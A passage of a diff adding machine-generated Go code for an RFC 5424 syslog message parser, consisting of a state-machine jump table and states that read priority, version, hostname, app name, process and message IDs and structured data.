st_case_329 + case 330: + goto st_case_330 + case 331: + goto st_case_331 + case 332: + goto st_case_332 + case 333: + goto st_case_333 + case 334: + goto st_case_334 + case 335: + goto st_case_335 + case 336: + goto st_case_336 + case 337: + goto st_case_337 + case 338: + goto st_case_338 + case 339: + goto st_case_339 + case 340: + goto st_case_340 + case 341: + goto st_case_341 + case 342: + goto st_case_342 + case 343: + goto st_case_343 + case 344: + goto st_case_344 + case 345: + goto st_case_345 + case 346: + goto st_case_346 + case 347: + goto st_case_347 + case 348: + goto st_case_348 + case 349: + goto st_case_349 + case 350: + goto st_case_350 + case 351: + goto st_case_351 + case 352: + goto st_case_352 + case 353: + goto st_case_353 + case 354: + goto st_case_354 + case 355: + goto st_case_355 + case 356: + goto st_case_356 + case 357: + goto st_case_357 + case 358: + goto st_case_358 + case 359: + goto st_case_359 + case 360: + goto st_case_360 + case 361: + goto st_case_361 + case 362: + goto st_case_362 + case 363: + goto st_case_363 + case 364: + goto st_case_364 + case 365: + goto st_case_365 + case 366: + goto st_case_366 + case 367: + goto st_case_367 + case 368: + goto st_case_368 + case 369: + goto st_case_369 + case 370: + goto st_case_370 + case 371: + goto st_case_371 + case 372: + goto st_case_372 + case 373: + goto st_case_373 + case 374: + goto st_case_374 + case 375: + goto st_case_375 + case 376: + goto st_case_376 + case 377: + goto st_case_377 + case 378: + goto st_case_378 + case 379: + goto st_case_379 + case 380: + goto st_case_380 + case 381: + goto st_case_381 + case 382: + goto st_case_382 + case 383: + goto st_case_383 + case 384: + goto st_case_384 + case 385: + goto st_case_385 + case 386: + goto st_case_386 + case 387: + goto st_case_387 + case 388: + goto st_case_388 + case 389: + goto st_case_389 + case 390: + goto st_case_390 + case 391: + goto st_case_391 + case 392: + goto st_case_392 + case 393: + goto st_case_393 + case 394: + goto st_case_394 + case 395: + goto st_case_395 + case 396: + goto st_case_396 + case 397: + goto st_case_397 + case 398: + goto st_case_398 + case 399: + goto st_case_399 + case 400: + goto st_case_400 + case 401: + goto st_case_401 + case 402: + goto st_case_402 + case 403: + goto st_case_403 + case 404: + goto st_case_404 + case 405: + goto st_case_405 + case 406: + goto st_case_406 + case 407: + goto st_case_407 + case 408: + goto st_case_408 + case 409: + goto st_case_409 + case 410: + goto st_case_410 + case 411: + goto st_case_411 + case 412: + goto st_case_412 + case 413: + goto st_case_413 + case 414: + goto st_case_414 + case 415: + goto st_case_415 + case 416: + goto st_case_416 + case 417: + goto st_case_417 + case 418: + goto st_case_418 + case 419: + goto st_case_419 + case 420: + goto st_case_420 + case 421: + goto st_case_421 + case 422: + goto st_case_422 + case 423: + goto st_case_423 + case 424: + goto st_case_424 + case 425: + goto st_case_425 + case 426: + goto st_case_426 + case 427: + goto st_case_427 + case 428: + goto st_case_428 + case 429: + goto st_case_429 + case 430: + goto st_case_430 + case 431: + goto st_case_431 + case 432: + goto st_case_432 + case 433: + goto st_case_433 + case 434: + goto st_case_434 + case 435: + goto st_case_435 + case 436: + goto st_case_436 + case 437: + goto st_case_437 + case 438: + goto st_case_438 + case 439: + goto st_case_439 + case 440: + goto st_case_440 + case 441: + goto st_case_441 + case 442: + goto st_case_442 + case 443: + goto st_case_443 + case 444: + goto st_case_444 + case 445: + goto st_case_445 + case 446: + goto st_case_446 + case 447: + goto st_case_447 + case 448: + goto st_case_448 + case 449: + goto st_case_449 + case 450: + goto st_case_450 + case 451: + goto st_case_451 + case 452: + goto st_case_452 + case 453: + goto st_case_453 + case 454: + goto st_case_454 + case 455: + goto st_case_455 + case 456: + goto st_case_456 + case 457: + goto st_case_457 + case 458: + goto st_case_458 + case 459: + goto st_case_459 + case 460: + goto st_case_460 + case 461: + goto st_case_461 + case 462: + goto st_case_462 + case 463: + goto st_case_463 + case 464: + goto st_case_464 + case 465: + goto st_case_465 + case 466: + goto st_case_466 + case 467: + goto st_case_467 + case 468: + goto st_case_468 + case 469: + goto st_case_469 + case 470: + goto st_case_470 + case 471: + goto st_case_471 + case 472: + goto st_case_472 + case 473: + goto st_case_473 + case 474: + goto st_case_474 + case 475: + goto st_case_475 + case 476: + goto st_case_476 + case 477: + goto st_case_477 + case 478: + goto st_case_478 + case 479: + goto st_case_479 + case 480: + goto st_case_480 + case 481: + goto st_case_481 + case 482: + goto st_case_482 + case 483: + goto st_case_483 + case 484: + goto st_case_484 + case 485: + goto st_case_485 + case 486: + goto st_case_486 + case 487: + goto st_case_487 + case 488: + goto st_case_488 + case 489: + goto st_case_489 + case 490: + goto st_case_490 + case 491: + goto st_case_491 + case 492: + goto st_case_492 + case 493: + goto st_case_493 + case 494: + goto st_case_494 + case 495: + goto st_case_495 + case 496: + goto st_case_496 + case 497: + goto st_case_497 + case 498: + goto st_case_498 + case 499: + goto st_case_499 + case 500: + goto st_case_500 + case 501: + goto st_case_501 + case 502: + goto st_case_502 + case 503: + goto st_case_503 + case 504: + goto st_case_504 + case 505: + goto st_case_505 + case 506: + goto st_case_506 + case 507: + goto st_case_507 + case 508: + goto st_case_508 + case 509: + goto st_case_509 + case 510: + goto st_case_510 + case 511: + goto st_case_511 + case 512: + goto st_case_512 + case 513: + goto st_case_513 + case 514: + goto st_case_514 + case 515: + goto st_case_515 + case 516: + goto st_case_516 + case 517: + goto st_case_517 + case 518: + goto st_case_518 + case 519: + goto st_case_519 + case 520: + goto st_case_520 + case 521: + goto st_case_521 + case 522: + goto st_case_522 + case 523: + goto st_case_523 + case 524: + goto st_case_524 + case 525: + goto st_case_525 + case 526: + goto st_case_526 + case 527: + goto st_case_527 + case 528: + goto st_case_528 + case 529: + goto st_case_529 + case 530: + goto st_case_530 + case 531: + goto st_case_531 + case 532: + goto st_case_532 + case 533: + goto st_case_533 + case 534: + goto st_case_534 + case 535: + goto st_case_535 + case 536: + goto st_case_536 + case 537: + goto st_case_537 + case 538: + goto st_case_538 + case 539: + goto st_case_539 + case 540: + goto st_case_540 + case 541: + goto st_case_541 + case 542: + goto st_case_542 + case 543: + goto st_case_543 + case 544: + goto st_case_544 + case 545: + goto st_case_545 + case 546: + goto st_case_546 + case 547: + goto st_case_547 + case 548: + goto st_case_548 + case 549: + goto st_case_549 + case 550: + goto st_case_550 + case 551: + goto st_case_551 + case 552: + goto st_case_552 + case 553: + goto st_case_553 + case 554: + goto st_case_554 + case 555: + goto st_case_555 + case 556: + goto st_case_556 + case 557: + goto st_case_557 + case 558: + goto st_case_558 + case 559: + goto st_case_559 + case 560: + goto st_case_560 + case 561: + goto st_case_561 + case 562: + goto st_case_562 + case 563: + goto st_case_563 + case 564: + goto st_case_564 + case 565: + goto st_case_565 + case 566: + goto st_case_566 + case 567: + goto st_case_567 + case 568: + goto st_case_568 + case 569: + goto st_case_569 + case 570: + goto st_case_570 + case 571: + goto st_case_571 + case 572: + goto st_case_572 + case 573: + goto st_case_573 + case 574: + goto st_case_574 + case 575: + goto st_case_575 + case 576: + goto st_case_576 + case 577: + goto st_case_577 + case 578: + goto st_case_578 + case 579: + goto st_case_579 + case 580: + goto st_case_580 + case 581: + goto st_case_581 + case 582: + goto st_case_582 + case 583: + goto st_case_583 + case 584: + goto st_case_584 + case 585: + goto st_case_585 + case 586: + goto st_case_586 + } + goto st_out + st_case_1: + if data[(p)] == 60 { + goto st2 + } + goto st0 + st_case_0: + st0: + cs = 0 + goto _out + st2: + if (p)++; (p) == (pe) { + goto _test_eof2 + } + st_case_2: + switch data[(p)] { + case 48: + goto tr2 + case 49: + goto tr3 + } + if 50 <= data[(p)] && data[(p)] <= 57 { + goto tr4 + } + goto st0 + tr2: +//line parser/common.rl:3 + + tok = p + + goto st3 + st3: + if (p)++; (p) == (pe) { + goto _test_eof3 + } + st_case_3: +//line rfc5424_parser.go:1264 + if data[(p)] == 62 { + goto tr5 + } + goto st0 + tr5: +//line parser/common.rl:7 + + event.SetPriority(data[tok:p]) + + goto st4 + st4: + if (p)++; (p) == (pe) { + goto _test_eof4 + } + st_case_4: +//line rfc5424_parser.go:1280 + if 49 <= data[(p)] && data[(p)] <= 57 { + goto tr6 + } + goto st0 + tr6: +//line parser/common.rl:3 + + tok = p + + goto st5 + st5: + if (p)++; (p) == (pe) { + goto _test_eof5 + } + st_case_5: +//line rfc5424_parser.go:1296 + if data[(p)] == 32 { + goto tr7 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st582 + } + goto st0 + tr7: +//line parser/common.rl:111 + + event.SetVersion(data[tok:p]) + + goto st6 + st6: + if (p)++; (p) == (pe) { + goto _test_eof6 + } + st_case_6: +//line rfc5424_parser.go:1315 + if data[(p)] == 45 { + goto st7 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto tr10 + } + goto st0 + tr579: +//line parser/common.rl:39 + + event.SetSecond(data[tok:p]) + + goto st7 + tr589: +//line parser/common.rl:43 + + event.SetNanosecond(data[tok:p]) + + goto st7 + st7: + if (p)++; (p) == (pe) { + goto _test_eof7 + } + st_case_7: +//line rfc5424_parser.go:1340 + if data[(p)] == 32 { + goto st8 + } + goto st0 + tr585: +//line parser/common.rl:103 + + event.SetTimeZone(data[tok:p]) + + goto st8 + st8: + if (p)++; (p) == (pe) { + goto _test_eof8 + } + st_case_8: +//line rfc5424_parser.go:1356 + if 33 <= data[(p)] && data[(p)] <= 126 { + goto tr12 + } + goto st0 + tr12: +//line parser/common.rl:3 + + tok = p + + goto st9 + st9: + if (p)++; (p) == (pe) { + goto _test_eof9 + } + st_case_9: +//line rfc5424_parser.go:1372 + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st293 + } + goto st0 + tr13: +//line parser/common.rl:91 + + event.SetHostname(data[tok:p]) + + goto st10 + st10: + if (p)++; (p) == (pe) { + goto _test_eof10 + } + st_case_10: +//line rfc5424_parser.go:1391 + if 33 <= data[(p)] && data[(p)] <= 126 { + goto tr15 + } + goto st0 + tr15: +//line parser/common.rl:3 + + tok = p + + goto st11 + st11: + if (p)++; (p) == (pe) { + goto _test_eof11 + } + st_case_11: +//line rfc5424_parser.go:1407 + if data[(p)] == 32 { + goto tr16 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st246 + } + goto st0 + tr16: +//line parser/common.rl:115 + + event.SetAppName(data[tok:p]) + + goto st12 + st12: + if (p)++; (p) == (pe) { + goto _test_eof12 + } + st_case_12: +//line rfc5424_parser.go:1426 + if 33 <= data[(p)] && data[(p)] <= 126 { + goto tr18 + } + goto st0 + tr18: +//line parser/common.rl:3 + + tok = p + + goto st13 + st13: + if (p)++; (p) == (pe) { + goto _test_eof13 + } + st_case_13: +//line rfc5424_parser.go:1442 + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st119 + } + goto st0 + tr19: +//line parser/common.rl:119 + + event.SetProcID(data[tok:p]) + + goto st14 + st14: + if (p)++; (p) == (pe) { + goto _test_eof14 + } + st_case_14: +//line rfc5424_parser.go:1461 + if 33 <= data[(p)] && data[(p)] <= 126 { + goto tr21 + } + goto st0 + tr21: +//line parser/common.rl:3 + + tok = p + + goto st15 + st15: + if (p)++; (p) == (pe) { + goto _test_eof15 + } + st_case_15: +//line rfc5424_parser.go:1477 + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st88 + } + goto st0 + tr22: +//line parser/common.rl:123 + + event.SetMsgID(data[tok:p]) + + goto st16 + st16: + if (p)++; (p) == (pe) { + goto _test_eof16 + } + st_case_16: +//line rfc5424_parser.go:1496 + switch data[(p)] { + case 45: + goto st587 + case 91: + goto tr25 + } + goto st0 + st587: + if (p)++; (p) == (pe) { + goto _test_eof587 + } + st_case_587: + if data[(p)] == 32 { + goto st588 + } + goto st0 + st588: + if (p)++; (p) == (pe) { + goto _test_eof588 + } + st_case_588: + goto tr599 + tr599: +//line parser/common.rl:3 + + tok = p + + goto st589 + st589: + if (p)++; (p) == (pe) { + goto _test_eof589 + } + st_case_589: +//line rfc5424_parser.go:1530 + goto st589 + tr25: +//line parser/common.rl:48 + + event.data = EventData{} + + goto st17 + st17: + if (p)++; (p) == (pe) { + goto _test_eof17 + } + st_case_17: +//line rfc5424_parser.go:1543 + if data[(p)] == 33 { + goto tr26 + } + switch { + case data[(p)] < 62: + if 35 <= data[(p)] && data[(p)] <= 60 { + goto tr26 + } + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto tr26 + } + default: + goto tr26 + } + goto st0 + tr26: +//line parser/common.rl:3 + + tok = p + + goto st18 + st18: + if (p)++; (p) == (pe) { + goto _test_eof18 + } + st_case_18: +//line rfc5424_parser.go:1571 + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st57 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st57 + } + case data[(p)] >= 35: + goto st57 + } + goto st0 + tr27: +//line parser/common.rl:64 + + state.sd_id = string(data[tok:p]) + if _, ok := event.data[state.sd_id]; ok { + (p)-- + + } else { + event.data[state.sd_id] = map[string]string{} + } + + goto st19 + st19: + if (p)++; (p) == (pe) { + goto _test_eof19 + } + st_case_19: +//line rfc5424_parser.go:1606 + if data[(p)] == 33 { + goto tr30 + } + switch { + case data[(p)] < 62: + if 35 <= data[(p)] && data[(p)] <= 60 { + goto tr30 + } + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto tr30 + } + default: + goto tr30 + } + goto st0 + tr30: +//line parser/common.rl:3 + + tok = p + + goto st20 + st20: + if (p)++; (p) == (pe) { + goto _test_eof20 + } + st_case_20: +//line rfc5424_parser.go:1634 + switch data[(p)] { + case 33: + goto st21 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st21 + } + case data[(p)] >= 35: + goto st21 + } + goto st0 + st21: + if (p)++; (p) == (pe) { + goto _test_eof21 + } + st_case_21: + switch data[(p)] { + case 33: + goto st22 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st22 + } + case data[(p)] >= 35: + goto st22 + } + goto st0 + st22: + if (p)++; (p) == (pe) { + goto _test_eof22 + } + st_case_22: + switch data[(p)] { + case 33: + goto st23 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st23 + } + case data[(p)] >= 35: + goto st23 + } + goto st0 + st23: + if (p)++; (p) == (pe) { + goto _test_eof23 + } + st_case_23: + switch data[(p)] { + case 33: + goto st24 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st24 + } + case data[(p)] >= 35: + goto st24 + } + goto st0 + st24: + if (p)++; (p) == (pe) { + goto _test_eof24 + } + st_case_24: + switch data[(p)] { + case 33: + goto st25 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st25 + } + case data[(p)] >= 35: + goto st25 + } + goto st0 + st25: + if (p)++; (p) == (pe) { + goto _test_eof25 + } + st_case_25: + switch data[(p)] { + case 33: + goto st26 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st26 + } + case data[(p)] >= 35: + goto st26 + } + goto st0 + st26: + if (p)++; (p) == (pe) { + goto _test_eof26 + } + st_case_26: + switch data[(p)] { + case 33: + goto st27 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st27 + } + case data[(p)] >= 35: + goto st27 + } + goto st0 + st27: + if (p)++; (p) == (pe) { + goto _test_eof27 + } + st_case_27: + switch data[(p)] { + case 33: + goto st28 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st28 + } + case data[(p)] >= 35: + goto st28 + } + goto st0 + st28: + if (p)++; (p) == (pe) { + goto _test_eof28 + } + st_case_28: + switch data[(p)] { + case 33: + goto st29 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st29 + } + case data[(p)] >= 35: + goto st29 + } + goto st0 + st29: + if (p)++; (p) == (pe) { + goto _test_eof29 + } + st_case_29: + switch data[(p)] { + case 33: + goto st30 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st30 + } + case data[(p)] >= 35: + goto st30 + } + goto st0 + st30: + if (p)++; (p) == (pe) { + goto _test_eof30 + } + st_case_30: + switch data[(p)] { + case 33: + goto st31 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st31 + } + case data[(p)] >= 35: + goto st31 + } + goto st0 + st31: + if (p)++; (p) == (pe) { + goto _test_eof31 + } + st_case_31: + switch data[(p)] { + case 33: + goto st32 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st32 + } + case data[(p)] >= 35: + goto st32 + } + goto st0 + st32: + if (p)++; (p) == (pe) { + goto _test_eof32 + } + st_case_32: + switch data[(p)] { + case 33: + goto st33 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st33 + } + case data[(p)] >= 35: + goto st33 + } + goto st0 + st33: + if (p)++; (p) == (pe) { + goto _test_eof33 + } + st_case_33: + switch data[(p)] { + case 33: + goto st34 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st34 + } + case data[(p)] >= 35: + goto st34 + } + goto st0 + st34: + if (p)++; (p) == (pe) { + goto _test_eof34 + } + st_case_34: + switch data[(p)] { + case 33: + goto st35 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st35 + } + case data[(p)] >= 35: + goto st35 + } + goto st0 + st35: + if (p)++; (p) == (pe) { + goto _test_eof35 + } + st_case_35: + switch data[(p)] { + case 33: + goto st36 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st36 + } + case data[(p)] >= 35: + goto st36 + } + goto st0 + st36: + if (p)++; (p) == (pe) { + goto _test_eof36 + } + st_case_36: + switch data[(p)] { + case 33: + goto st37 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st37 + } + case data[(p)] >= 35: + goto st37 + } + goto st0 + st37: + if (p)++; (p) == (pe) { + goto _test_eof37 + } + st_case_37: + switch data[(p)] { + case 33: + goto st38 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st38 + } + case data[(p)] >= 35: + goto st38 + } + goto st0 + st38: + if (p)++; (p) == (pe) { + goto _test_eof38 + } + st_case_38: + switch data[(p)] { + case 33: + goto st39 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st39 + } + case data[(p)] >= 35: + goto st39 + } + goto st0 + st39: + if (p)++; (p) == (pe) { + goto _test_eof39 + } + st_case_39: + switch data[(p)] { + case 33: + goto st40 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st40 + } + case data[(p)] >= 35: + goto st40 + } + goto st0 + st40: + if (p)++; (p) == (pe) { + goto _test_eof40 + } + st_case_40: + switch data[(p)] { + case 33: + goto st41 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st41 + } + case data[(p)] >= 35: + goto st41 + } + goto st0 + st41: + if (p)++; (p) == (pe) { + goto _test_eof41 + } + st_case_41: + switch data[(p)] { + case 33: + goto st42 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st42 + } + case data[(p)] >= 35: + goto st42 + } + goto st0 + st42: + if (p)++; (p) == (pe) { + goto _test_eof42 + } + st_case_42: + switch data[(p)] { + case 33: + goto st43 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st43 + } + case data[(p)] >= 35: + goto st43 + } + goto st0 + st43: + if (p)++; (p) == (pe) { + goto _test_eof43 + } + st_case_43: + switch data[(p)] { + case 33: + goto st44 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st44 + } + case data[(p)] >= 35: + goto st44 + } + goto st0 + st44: + if (p)++; (p) == (pe) { + goto _test_eof44 + } + st_case_44: + switch data[(p)] { + case 33: + goto st45 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st45 + } + case data[(p)] >= 35: + goto st45 + } + goto st0 + st45: + if (p)++; (p) == (pe) { + goto _test_eof45 + } + st_case_45: + switch data[(p)] { + case 33: + goto st46 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st46 + } + case data[(p)] >= 35: + goto st46 + } + goto st0 + st46: + if (p)++; (p) == (pe) { + goto _test_eof46 + } + st_case_46: + switch data[(p)] { + case 33: + goto st47 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st47 + } + case data[(p)] >= 35: + goto st47 + } + goto st0 + st47: + if (p)++; (p) == (pe) { + goto _test_eof47 + } + st_case_47: + switch data[(p)] { + case 33: + goto st48 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st48 + } + case data[(p)] >= 35: + goto st48 + } + goto st0 + st48: + if (p)++; (p) == (pe) { + goto _test_eof48 + } + st_case_48: + switch data[(p)] { + case 33: + goto st49 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st49 + } + case data[(p)] >= 35: + goto st49 + } + goto st0 + st49: + if (p)++; (p) == (pe) { + goto _test_eof49 + } + st_case_49: + switch data[(p)] { + case 33: + goto st50 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st50 + } + case data[(p)] >= 35: + goto st50 + } + goto st0 + st50: + if (p)++; (p) == (pe) { + goto _test_eof50 + } + st_case_50: + switch data[(p)] { + case 33: + goto st51 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st51 + } + case data[(p)] >= 35: + goto st51 + } + goto st0 + st51: + if (p)++; (p) == (pe) { + goto _test_eof51 + } + st_case_51: + if data[(p)] == 61 { + goto tr32 + } + goto st0 + tr32: +//line parser/common.rl:56 + + state.sd_param_name = string(data[tok:p]) + + goto st52 + st52: + if (p)++; (p) == (pe) { + goto _test_eof52 + } + st_case_52: +//line rfc5424_parser.go:2270 + if data[(p)] == 34 { + goto st53 + } + goto st0 + st53: + if (p)++; (p) == (pe) { + goto _test_eof53 + } + st_case_53: + switch data[(p)] { + case 34: + goto st0 + case 92: + goto tr65 + case 93: + goto st0 + } + goto tr64 + tr64: +//line parser/common.rl:3 + + tok = p + + goto st54 + st54: + if (p)++; (p) == (pe) { + goto _test_eof54 + } + st_case_54: +//line rfc5424_parser.go:2300 + switch data[(p)] { + case 34: + goto tr67 + case 92: + goto tr68 + case 93: + goto st0 + } + goto st54 + tr67: +//line parser/common.rl:60 + + event.SetData(state.sd_id, state.sd_param_name, data, tok, p, state.sd_value_bs) + +//line parser/common.rl:52 + + state.sd_value_bs = []int{} + + goto st55 + st55: + if (p)++; (p) == (pe) { + goto _test_eof55 + } + st_case_55: +//line rfc5424_parser.go:2325 + switch data[(p)] { + case 32: + goto st19 + case 33: + goto tr30 + case 93: + goto st590 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto tr30 + } + case data[(p)] >= 35: + goto tr30 + } + goto st0 + tr29: +//line parser/common.rl:64 + + state.sd_id = string(data[tok:p]) + if _, ok := event.data[state.sd_id]; ok { + (p)-- + + } else { + event.data[state.sd_id] = map[string]string{} + } + + goto st590 + st590: + if (p)++; (p) == (pe) { + goto _test_eof590 + } + st_case_590: +//line rfc5424_parser.go:2360 + switch data[(p)] { + case 32: + goto st588 + case 91: + goto st17 + } + goto st0 + tr65: +//line parser/common.rl:3 + + tok = p + +//line parser/common.rl:73 + + state.sd_value_bs = append(state.sd_value_bs, p) + + goto st56 + tr68: +//line parser/common.rl:73 + + state.sd_value_bs = append(state.sd_value_bs, p) + + goto st56 + st56: + if (p)++; (p) == (pe) { + goto _test_eof56 + } + st_case_56: +//line rfc5424_parser.go:2389 + if data[(p)] == 34 { + goto st54 + } + if 92 <= data[(p)] && data[(p)] <= 93 { + goto st54 + } + goto st0 + st57: + if (p)++; (p) == (pe) { + goto _test_eof57 + } + st_case_57: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st58 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st58 + } + case data[(p)] >= 35: + goto st58 + } + goto st0 + st58: + if (p)++; (p) == (pe) { + goto _test_eof58 + } + st_case_58: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st59 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st59 + } + case data[(p)] >= 35: + goto st59 + } + goto st0 + st59: + if (p)++; (p) == (pe) { + goto _test_eof59 + } + st_case_59: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st60 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st60 + } + case data[(p)] >= 35: + goto st60 + } + goto st0 + st60: + if (p)++; (p) == (pe) { + goto _test_eof60 + } + st_case_60: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st61 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st61 + } + case data[(p)] >= 35: + goto st61 + } + goto st0 + st61: + if (p)++; (p) == (pe) { + goto _test_eof61 + } + st_case_61: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st62 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st62 + } + case data[(p)] >= 35: + goto st62 + } + goto st0 + st62: + if (p)++; (p) == (pe) { + goto _test_eof62 + } + st_case_62: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st63 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st63 + } + case data[(p)] >= 35: + goto st63 + } + goto st0 + st63: + if (p)++; (p) == (pe) { + goto _test_eof63 + } + st_case_63: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st64 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st64 + } + case data[(p)] >= 35: + goto st64 + } + goto st0 + st64: + if (p)++; (p) == (pe) { + goto _test_eof64 + } + st_case_64: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st65 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st65 + } + case data[(p)] >= 35: + goto st65 + } + goto st0 + st65: + if (p)++; (p) == (pe) { + goto _test_eof65 + } + st_case_65: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st66 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st66 + } + case data[(p)] >= 35: + goto st66 + } + goto st0 + st66: + if (p)++; (p) == (pe) { + goto _test_eof66 + } + st_case_66: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st67 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st67 + } + case data[(p)] >= 35: + goto st67 + } + goto st0 + st67: + if (p)++; (p) == (pe) { + goto _test_eof67 + } + st_case_67: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st68 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st68 + } + case data[(p)] >= 35: + goto st68 + } + goto st0 + st68: + if (p)++; (p) == (pe) { + goto _test_eof68 + } + st_case_68: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st69 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st69 + } + case data[(p)] >= 35: + goto st69 + } + goto st0 + st69: + if (p)++; (p) == (pe) { + goto _test_eof69 + } + st_case_69: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st70 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st70 + } + case data[(p)] >= 35: + goto st70 + } + goto st0 + st70: + if (p)++; (p) == (pe) { + goto _test_eof70 + } + st_case_70: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st71 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st71 + } + case data[(p)] >= 35: + goto st71 + } + goto st0 + st71: + if (p)++; (p) == (pe) { + goto _test_eof71 + } + st_case_71: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st72 + case 93: + goto tr29 + } + switch { 